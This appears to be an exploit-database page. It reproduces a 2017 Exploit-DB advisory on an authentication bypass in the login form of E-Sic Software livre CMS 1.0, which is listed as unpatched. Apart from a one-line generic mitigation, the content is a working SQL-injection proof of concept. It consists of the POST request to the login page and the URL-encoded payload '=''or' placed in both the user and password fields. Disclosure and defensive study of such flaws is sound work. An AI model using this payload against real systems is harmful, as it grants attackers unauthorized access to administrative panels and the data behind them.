E-Sic Software livre CMS - Autentication Bypass

vendor:

E-Sic Software livre CMS

by:

Elber Tavares

7,5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: E-Sic Software livre CMS

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:software_publico:e-sic_livre

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Kali Linux, Windows 7, 8.1, 10 - Firefox

2017

E-Sic Software livre CMS – Autentication Bypass

The vulnerability is in the login area of e-sic, where an attacker can enter the panel without providing valid credentials by using some parameters such as username and password. The PoC for this exploit is to send a POST request to http://vulnsite/esic/index/index.php with the data login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar

Mitigation:

The best way to mitigate this vulnerability is to ensure that authentication is properly implemented and that all user input is properly validated.

Source

Exploit-DB raw data:

# Exploit Title: E-Sic Software livre CMS - Autentication Bypass#
Date: 12/10/2017# Exploit Author: Elber Tavares# Vendor Homepage:
https://softwarepublico.gov.br/# Version: 1.0# Tested on: kali linux,
windows 7, 8.1, 10 - Firefox# Download
https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:
http://whiteboyz.xyz/esic-software-publico-autentication-bypass.html

The vulnerability is in the login area of e-sic,
where we can enter the panel only using some parameters such as
username and password
---------------------------------------------------------------------
PoC:
Url: http://vulnsite/esic/index/ User: '=''or' Pass: '=''or'
POST: http://vulnsite/esic/index/index.php
DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar